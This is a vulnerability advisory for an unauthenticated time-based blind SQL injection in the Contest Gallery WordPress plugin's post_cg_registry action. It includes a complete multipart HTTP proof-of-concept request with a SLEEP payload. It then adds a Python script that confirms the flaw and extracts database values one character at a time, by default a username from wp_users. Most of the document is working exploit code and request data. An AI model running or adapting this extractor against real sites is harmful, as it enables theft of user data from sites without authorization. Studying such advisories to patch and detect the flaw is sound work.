wpexploit | Daniel Krohmer | WPEX-ID: 1B3B51AF-AD73-4F8E-BA97-375B8A363B64
History: Dec 05, 2022 - 12:00 a.m.

Contest Gallery < 19.1.5 - Unauthenticated SQL Injection

2022-12-05 00:00:00
Daniel Krohmer
sql injection
form data
security breach
unauthenticated access
http request

EPSS: 0.002
Percentile: 60.0%

The plugin does not escape the cg_Fields POST parameter before concatenating it into an SQL query in users-registry-check-registering-and-login.php. The query is reached through the unauthenticated admin-ajax.php action post_cg_registry, so any visitor can inject SQL and leak sensitive information from the site's database. The injection is blind: the request below places a SLEEP(5) payload in cg_Fields[1][Form_Input_ID], and a vulnerable site answers roughly five seconds later than a request with a plain numeric value.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------22204028416237992052154109961
Content-Length: 3796
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/?p=1
Cookie: wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_current_page_id"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_check"

63e2eac15c3548881b7e582f807cb491fc9b8c0cb7a61631580a8db22fa29d70
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="action"

post_cg_registry
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_gallery_id_registry"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Form_Input_ID]"

1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Type]"

user-check-agreement-field					
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Order]"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Form_Input_ID]"

2
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Type]"

main-nick-name
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Order]"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Form_Input_ID]"

3
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Type]"

main-mail
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Order]"

2
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Content]"

[email protected]
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Form_Input_ID]"

4
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Type]"

password
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Order]"

3
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Form_Input_ID]"

5
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Type]"

password-confirm
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Order]"

4
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-mail"

[email protected]
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-user-name"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-nick-name"

testing
-----------------------------22204028416237992052154109961--
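The request above is a single timing probe. The script below is an added example, not the advisory's or the Contest Gallery project's code: it rebuilds the same multipart field set, confirms the injection by comparing a true and a false SLEEP condition against a baseline request, and then reads a string out of the database one character at a time by binary search over the timing oracle. The cg_check value is assumed to be a per-form token copied from the registration form the site serves, the wp_users table name assumes the default WordPress prefix, and the e-mail address is a constructed placeholder.

```python
"""Time-based blind SQL injection probe and extractor for the Contest Gallery
post_cg_registry request (added example, not the advisory's own code)."""
import time
import urllib.error
import urllib.request
from typing import Callable, Dict

SLEEP_SECONDS = 5  # same delay the advisory's payload uses
EMAIL = "testing@example.invalid"  # constructed placeholder
FORM_FIELDS = [  # (Form_Input_ID, Field_Type, Field_Order, Field_Content) as in the PoC
    ("1", "user-check-agreement-field", "1", "testing"),
    ("2", "main-nick-name", "1", "testing"),
    ("3", "main-mail", "2", EMAIL),
    ("4", "password", "3", "testing"),
    ("5", "password-confirm", "4", "testing"),
]


def multipart_body(fields: Dict[str, str], boundary: str) -> bytes:
    """Serialise name/value pairs as multipart/form-data, CRLF-delimited."""
    parts = []
    for name, value in fields.items():
        parts += [f"--{boundary}", f'Content-Disposition: form-data; name="{name}"', "", value]
    parts += [f"--{boundary}--", ""]
    return "\r\n".join(parts).encode()


def registry_fields(form_input_id: str, cg_check: str, gallery_id: str = "1") -> Dict[str, str]:
    """Field set from the advisory's request; form_input_id lands in the injectable
    cg_Fields[1][Form_Input_ID]. cg_check is assumed to be a per-form token."""
    fields = {"cg_current_page_id": "1", "cg_check": cg_check,
              "action": "post_cg_registry", "cg_gallery_id_registry": gallery_id}
    for i, (fid, ftype, order, content) in enumerate(FORM_FIELDS, start=1):
        if i == 1:
            fid = form_input_id  # injection point
        fields[f"cg_Fields[{i}][Form_Input_ID]"] = fid
        fields[f"cg_Fields[{i}][Field_Type]"] = ftype
        fields[f"cg_Fields[{i}][Field_Order]"] = order
        fields[f"cg_Fields[{i}][Field_Content]"] = content
    fields.update({"cg-main-mail": EMAIL, "cg-main-user-name": "testing", "cg-main-nick-name": "testing"})
    return fields


def sleep_payload(condition: str = "1=1", seconds: int = SLEEP_SECONDS) -> str:
    """Advisory-style payload; the delay fires only when condition is true.
    Spaces become /**/ exactly as in the PoC value."""
    sql = f"1 AND (SELECT 7741 FROM (SELECT(IF(({condition}),SLEEP({seconds}),0)))hlAf)"
    return sql.replace(" ", "/**/")


def gt_condition(expr: str, pos: int, value: int) -> str:
    """True in MySQL when the character at 1-based pos of expr's result exceeds value.
    Past the end, ASCII(SUBSTRING(...)) is 0, which ends extraction."""
    return f"ASCII(SUBSTRING({expr},{pos},1))>{value}"


def is_delayed(elapsed: float, baseline: float, seconds: int = SLEEP_SECONDS) -> bool:
    """Count a request as delayed only if it exceeds the baseline by most of the sleep."""
    return elapsed - baseline >= 0.8 * seconds


def timed_post(url: str, fields: Dict[str, str]) -> float:
    """POST the fields to admin-ajax.php and return the wall-clock seconds taken."""
    boundary = "----cgprobe" + str(int(time.time()))
    req = urllib.request.Request(
        url, data=multipart_body(fields, boundary), method="POST",
        headers={"Content-Type": f"multipart/form-data; boundary={boundary}",
                 "X-Requested-With": "XMLHttpRequest"})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=4 * SLEEP_SECONDS) as resp:
            resp.read()
    except urllib.error.HTTPError:
        pass  # an error status is still timed; only the delay matters
    return time.monotonic() - start


def probe(url: str, cg_check: str) -> bool:
    """Confirm the injection: a true condition must delay, a false one must not."""
    base = timed_post(url, registry_fields("1", cg_check))
    slow = timed_post(url, registry_fields(sleep_payload("1=1"), cg_check))
    fast = timed_post(url, registry_fields(sleep_payload("1=2"), cg_check))
    return is_delayed(slow, base) and not is_delayed(fast, base)


def extract_char(greater_than: Callable[[int, int], bool], pos: int) -> str:
    """Binary-search one 7-bit character through a (pos, value) -> bool oracle."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(pos, mid):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_string(greater_than: Callable[[int, int], bool], max_len: int = 64) -> str:
    """Read characters until the oracle reports ASCII 0 (end of the value)."""
    out = ""
    for pos in range(1, max_len + 1):
        ch = extract_char(greater_than, pos)
        if ch == "\0":
            break
        out += ch
    return out


def timing_oracle(url: str, cg_check: str, expr: str, baseline: float) -> Callable[[int, int], bool]:
    """Wrap the live request in the oracle shape extract_* expects."""
    return lambda pos, value: is_delayed(
        timed_post(url, registry_fields(sleep_payload(gt_condition(expr, pos, value)), cg_check)), baseline)


if __name__ == "__main__":
    import sys
    url, token = sys.argv[1], sys.argv[2]  # e.g. http://localhost:8080/wp-admin/admin-ajax.php <cg_check>
    if probe(url, token):
        base = timed_post(url, registry_fields("1", token))
        # wp_users assumes the default table prefix
        print(extract_string(timing_oracle(url, token, "(SELECT user_login FROM wp_users LIMIT 1)", base)))
```

Each extracted character costs seven requests, most of which sleep, so a single username takes a few minutes; the false-condition check in probe() keeps a slow or overloaded host from being reported as vulnerable on timing alone.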
